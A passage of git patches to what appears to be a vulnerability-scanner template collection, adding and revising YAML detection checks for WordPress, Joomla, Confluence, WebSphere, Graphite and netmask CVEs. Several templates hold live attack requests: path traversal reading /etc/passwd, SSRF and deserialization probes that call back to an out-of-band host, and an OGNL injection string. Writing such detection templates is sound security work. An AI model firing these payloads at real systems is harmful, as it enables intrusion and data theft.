"{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + matchers: + - type: word + part: interactsh-protocol + words: + - "http" + From 6e7c3ab0a2aa55829d42e467249edce69dbfdb14 Mon Sep 17 00:00:00 2001 From: Borna Nematzadeh <88947751+LogicalHunter@users.noreply.github.com> Date: Thu, 2 Sep 2021 12:26:10 -0700 Subject: [PATCH 1997/4083] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index c3cb68cde0..b7189961be 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -15,10 +15,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" - matchers: - type: word part: interactsh-protocol words: - "http" - From 6e7b1d9514e8b2594d109c69172b2c5368f0910f Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 3 Sep 2021 08:13:47 +0900 Subject: [PATCH 1998/4083] Create CVE-2015-5461.yaml --- CVE-2015-5461.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 CVE-2015-5461.yaml diff --git a/CVE-2015-5461.yaml b/CVE-2015-5461.yaml new file mode 100644 index 0000000000..464a3585f9 --- /dev/null +++ b/CVE-2015-5461.yaml @@ -0,0 +1,20 @@ +id: CVE-2015-5461 + +info: + name: StageShow <= 5.0.8 - Open Redirect + author: 0x_Akoko + description: The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. + reference: https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 + severity: medium + tags: redirect,cves,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 8ccc4283ed71ddef4a001755f54bff172ca597e9 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 3 Sep 2021 08:15:23 +0900 Subject: [PATCH 1999/4083] Create CVE-2021-34370.yaml --- CVE-2021-34370.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 CVE-2021-34370.yaml diff --git a/CVE-2021-34370.yaml b/CVE-2021-34370.yaml new file mode 100644 index 0000000000..13b713dd9e --- /dev/null +++ b/CVE-2021-34370.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-34370 + +info: + name: Accela Civic Platform 21.1 - Open Redirect & XSS + author: 0x_Akoko + description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 + reference: https://www.exploit-db.com/exploits/49990 + severity: medium + tags: xss,redirect,cves + +requests: + - method: GET + path: + - "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From ec15d47e3ab0d3a7e5017e37b39073455424f56d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 3 Sep 2021 07:42:37 +0700 Subject: [PATCH 2000/4083] Create CVE-2010-1313.yaml --- cves/CVE-2010-1313.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/CVE-2010-1313.yaml diff --git a/cves/CVE-2010-1313.yaml b/cves/CVE-2010-1313.yaml new file mode 100644 index 0000000000..46a6e36549 --- /dev/null +++ b/cves/CVE-2010-1313.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1313 + +info: + name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12082 + - https://www.cvedetails.com/cve/CVE-2010-1313 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 22d7d79a60c6ff7889f1eb5a071b537a93db208c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 3 Sep 2021 07:43:09 +0700 Subject: [PATCH 2001/4083] Rename cves/CVE-2010-1313.yaml to cves/2010/CVE-2010-1313.yaml --- cves/{ => 2010}/CVE-2010-1313.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/{ => 2010}/CVE-2010-1313.yaml (100%) diff --git a/cves/CVE-2010-1313.yaml b/cves/2010/CVE-2010-1313.yaml similarity index 100% rename from cves/CVE-2010-1313.yaml rename to cves/2010/CVE-2010-1313.yaml From 541b61d0c437994155e75492d9534cfb294d366d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 3 Sep 2021 07:54:38 +0700 Subject: [PATCH 2002/4083] Create CVE-2010-1470.yaml --- cves/2010/CVE-2010-1470.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1470.yaml diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml new file mode 100644 index 0000000000..bcb3e84703 --- /dev/null +++ b/cves/2010/CVE-2010-1470.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1470 + +info: + name: Joomla! Component Web TV 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12166 + - https://www.cvedetails.com/cve/CVE-2010-1470 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c38cb4a7b22bc4da90480b579608ef77169a953d Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 3 Sep 2021 09:16:36 +0530 Subject: [PATCH 2003/4083] Update and rename CVE-2021-34370.yaml to cves/2021/CVE-2021-34370.yaml --- CVE-2021-34370.yaml => cves/2021/CVE-2021-34370.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename CVE-2021-34370.yaml => cves/2021/CVE-2021-34370.yaml (72%) diff --git a/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml similarity index 72% rename from CVE-2021-34370.yaml rename to cves/2021/CVE-2021-34370.yaml index 13b713dd9e..a920b1c540 100644 --- a/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -3,10 +3,13 @@ id: CVE-2021-34370 info: name: Accela Civic Platform 21.1 - Open Redirect & XSS author: 0x_Akoko - description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 - reference: https://www.exploit-db.com/exploits/49990 severity: medium - tags: xss,redirect,cves + description: Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1 + reference: + - https://www.exploit-db.com/exploits/49990 + - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 + - https://www.accela.com/civic-platform/ + tags: xss,redirect,cve,cve2021 requests: - method: GET From c8094b0987c4611bce842441343085e24e0feac8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 3 Sep 2021 09:20:05 +0530 Subject: [PATCH 2004/4083] Update and rename CVE-2015-5461.yaml to cves/2015/CVE-2015-5461.yaml --- CVE-2015-5461.yaml | 20 -------------------- cves/2015/CVE-2015-5461.yaml | 22 ++++++++++++++++++++++ 2 files changed, 22 insertions(+), 20 deletions(-) delete mode 100644 CVE-2015-5461.yaml create mode 100644 cves/2015/CVE-2015-5461.yaml diff --git a/CVE-2015-5461.yaml b/CVE-2015-5461.yaml deleted file mode 100644 index 464a3585f9..0000000000 --- a/CVE-2015-5461.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2015-5461 - -info: - name: StageShow <= 5.0.8 - Open Redirect - author: 0x_Akoko - description: The StageShow WordPress plugin was affected by an Open Redirect security vulnerability. - reference: https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - severity: medium - tags: redirect,cves,wp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml new file mode 100644 index 0000000000..e5416a7c9e --- /dev/null +++ b/cves/2015/CVE-2015-5461.yaml @@ -0,0 +1,22 @@ +id: CVE-2015-5461 + +info: + name: StageShow <= 5.0.8 - Open Redirect + author: 0x_Akoko + severity: medium + description: Open redirect vulnerability in the Redirect function in stageshow_redirect.php in the StageShow plugin before 5.0.9 for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. + reference: + - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + tags: redirect,cve,cve2015,wordpress,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 58a886ad6e7657bfe4ff9789659769edd8400ec6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 3 Sep 2021 09:24:21 +0530 Subject: [PATCH 2005/4083] Update CVE-2020-28976.yaml --- cves/2020/CVE-2020-28976.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index b7189961be..97b6dcc096 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 @@ -17,6 +18,6 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" matchers: - type: word - part: interactsh-protocol + part: interactsh_protocol words: - "http" From 56af312e250265fb02590ea718cab1d4a2f5ca46 Mon Sep 17 00:00:00 2001 From: John Jackson <39013067+johnjhacking@users.noreply.github.com> Date: Thu, 2 Sep 2021 22:48:24 -0600 Subject: [PATCH 2006/4083] Added an additional check Hello, when you get the change, please check the changes. I removed some of the methods and cleaned it up + made a matcher for /etc/passwd. Thanks! --- cves/2021/CVE-2021-28918.yaml | 17 +++++++++++------ 1 file changed, 11 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 1f0f3c4456..8256fd4662 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,7 +1,7 @@ id: CVE-2021-28918 info: - name: Netmask NPM Package SSRF + name: Netmask npm Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. @@ -15,19 +15,24 @@ requests: - method: GET path: - "{{BaseURL}}/?url=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?uri=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?dest=http://0177.0.0.1/server-status" - - "{{BaseURL}}/?redirect=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" + - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - + - type: word part: body words: - "Apache Server Status" - "Server Version" - condition: and \ No newline at end of file + condition: and + + - type: word + part: body + words: + - "root:x:0:0:root:" + condition: or From ca2963beb63c6cd5e6ae8e935bd6ecd869ec12b5 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 12:15:26 +0530 Subject: [PATCH 2007/4083] encoding update --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index a28bfc6ead..39d042bfcf 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -27,7 +27,7 @@ requests: <ns1:invoke xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <objectname xsi:type="ns1:javax.management.ObjectName">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname> <operationname xsi:type="xsd:string">getUnsavedChanges</operationname> - <params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}}</params> + <params xsi:type="ns1:[Ljava.lang.Object;">{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}</params> <signature xsi:type="ns1:[Ljava.lang.String;">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature> </ns1:invoke> </SOAP-ENV:Body> From 9fdac495f7582f3c502742cb6ebbd999f97d18fc Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 12:16:53 +0530 Subject: [PATCH 2008/4083] more tags --- cves/2015/CVE-2015-7450.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml index 39d042bfcf..e27a3e815f 100644 --- a/cves/2015/CVE-2015-7450.yaml +++ b/cves/2015/CVE-2015-7450.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce + tags: cve,cve2015,websphere,deserialization,rce,oob requests: - raw: From 2d104a005348741262a7bce6a0fc028d6f825e01 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 12:40:20 +0530 Subject: [PATCH 2009/4083] Added multiple endpoint support --- cves/2021/CVE-2021-26084.yaml | 33 ++++++++++++++++----------------- 1 file changed, 16 insertions(+), 17 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 8ed6fb59a8..1ef19a23c1 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -8,34 +8,33 @@ info: tags: cve,cve2021,rce,confluence reference: - https://jira.atlassian.com/browse/CONFSERVER-67940 - - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 requests: - raw: - | - POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + POST /{{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - raw: - - | - POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - - raw: - - | - POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - templates/editor-preload-container + - users/user-dark-features - queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status From c41a4985053c4e73c41b66ef67668a5a19b70b8b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 12:52:27 +0530 Subject: [PATCH 2010/4083] added tags --- cves/2020/CVE-2020-28976.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 97b6dcc096..00e084429e 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 - tags: cve,cve2020,ssrf,wordpress,wp-plugin + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob requests: - method: GET @@ -16,6 +16,8 @@ requests: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true matchers: - type: word part: interactsh_protocol From f81851b53b19e234744b4380514193125892f919 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 13:10:35 +0530 Subject: [PATCH 2011/4083] few fixes --- cves/2021/CVE-2021-28918.yaml | 21 ++++++++------------- 1 file changed, 8 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index 8256fd4662..f7008e8785 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -1,12 +1,12 @@ id: CVE-2021-28918 info: - name: Netmask npm Package SSRF + name: Netmask NPM Package SSRF author: johnjhacking severity: critical description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi - reference: | + reference: - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - https://github.com/advisories/GHSA-pch5-whg9-qr2r @@ -18,21 +18,16 @@ requests: - "{{BaseURL}}/?host=http://0177.0.0.1/server-status" - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - "Apache Server Status" - "Server Version" condition: and - - - type: word - part: body - words: - - "root:x:0:0:root:" - condition: or + + - type: regex + regex: + - "root:.*:0:0:" From eea43b6304efc07539eabe46dbed4324fc4d253f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 13:14:24 +0530 Subject: [PATCH 2012/4083] Update CVE-2021-28918.yaml --- cves/2021/CVE-2021-28918.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-28918.yaml b/cves/2021/CVE-2021-28918.yaml index f7008e8785..d591e23f66 100644 --- a/cves/2021/CVE-2021-28918.yaml +++ b/cves/2021/CVE-2021-28918.yaml @@ -7,9 +7,9 @@ info: description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts. tags: cve,cve2021,npm,netmask,ssrf,lfi reference: - - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 - - https://github.com/advisories/GHSA-pch5-whg9-qr2r + - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-28918 + - https://github.com/advisories/GHSA-pch5-whg9-qr2r requests: - method: GET From 216c66771ff6d9fc1c8714e8066ae9395a72989c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 13:52:53 +0530 Subject: [PATCH 2013/4083] Added CVE-2017-18638 Co-Authored-By: bigzero <3676342+bigzero@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2017/CVE-2017-18638.yaml diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml new file mode 100644 index 0000000000..ee5dd415b7 --- /dev/null +++ b/cves/2017/CVE-2017-18638.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-18638 + +info: + name: Graphite "graphite.composer.views.send_email" SSRF + author: huowuzhao + severity: high + description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + reference: + - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html + - https://github.com/graphite-project/graphite-web/issues/2008 + - https://github.com/advisories/GHSA-vfj6-275q-4pvm + - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 + tags: cve,cve2017,graphite,ssrf,oob + +requests: + - method: GET + path: + - '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From 064cc0c29f97208d0244b2c62a9c4d3a9a3e9b6b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 13:56:09 +0530 Subject: [PATCH 2014/4083] Update CVE-2017-18638.yaml Co-Authored-By: bigzeroo <39177268+bigzeroo@users.noreply.github.com> --- cves/2017/CVE-2017-18638.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index ee5dd415b7..bf1abb9b15 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -1,7 +1,7 @@ id: CVE-2017-18638 info: - name: Graphite "graphite.composer.views.send_email" SSRF + name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. From ac4bce9ca58ceecde41e9d999d4008d740bd17a2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 11:28:42 -0500 Subject: [PATCH 2015/4083] Update php-errors.yaml Made better through use of regex extractors. More useful information is displayed on-screen. --- misconfiguration/php-errors.yaml | 47 ++++++++++++++++++-------------- 1 file changed, 26 insertions(+), 21 deletions(-) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index d4b4f20178..11e7defb9f 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -2,31 +2,36 @@ id: php_errors info: name: PHP errors - author: w4cky_ + author: w4cky_,geeknik severity: info - tags: debug + tags: debug,php requests: - method: GET path: - "{{BaseURL}}" - matchers: - - type: word - words: - - "Fatal error" - - "Call to undefined method" - - "You have an error in your SQL syntax;" - - "MySQL server version for the right syntax to use near" - - "PHP Warning" - - "PHP Error" - - "Warning: mysql_connect():" - - "Warning: mysql_query()" - - "Warning: pg_connect():" - - "failed to open stream: HTTP request failed" - - "SAFE MODE Restriction in effect." - - "Cannot modify header information" - - "ORA-00921: unexpected end of SQL command" - - "ORA-00933: SQL command not properly ended" - - "ORA-00936: missing expression" - - "ORA-12541: TNS:no listener" \ No newline at end of file + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)PHP (Warning|Error)' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)(syntax|parse) error' From d27dadb79ef4901962673a90427d47fe132911a9 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 3 Sep 2021 22:24:11 +0530 Subject: [PATCH 2016/4083] updated matchers --- .../http-missing-security-headers.yaml | 146 ++++++++++-------- 1 file changed, 80 insertions(+), 66 deletions(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 350fcbe9db..97d80d6c05 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -11,103 +11,117 @@ requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: or matchers: - - type: word - name: "Strict-Transport-Security" - words: - - "Strict-Transport-Security" - part: header + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" negative: true - - type: word - name: "Content-Security-Policy" - words: - - "Content-Security-Policy" part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" negative: true - - type: word - name: "X-Frame-Options" - words: - - "X-Frame-Options" part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" negative: true - - type: word - name: "X-Content-Type-Options" - words: - - "X-Content-Type-Options" part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" negative: true - - type: word - name: "X-Permitted-Cross-Domain-Policies" - words: - - "X-Permitted-Cross-Domain-Policies" part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" negative: true - - type: word - name: "Referrer-Policy" - words: - - "Referrer-Policy" part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" negative: true - - type: word - name: "Clear-Site-Data" - words: - - "Clear-Site-Data" part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" negative: true - - type: word - name: "Cross-Origin-Embedder-Policy" - words: - - "Cross-Origin-Embedder-Policy" part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" negative: true - - type: word - name: "Cross-Origin-Opener-Policy" - words: - - 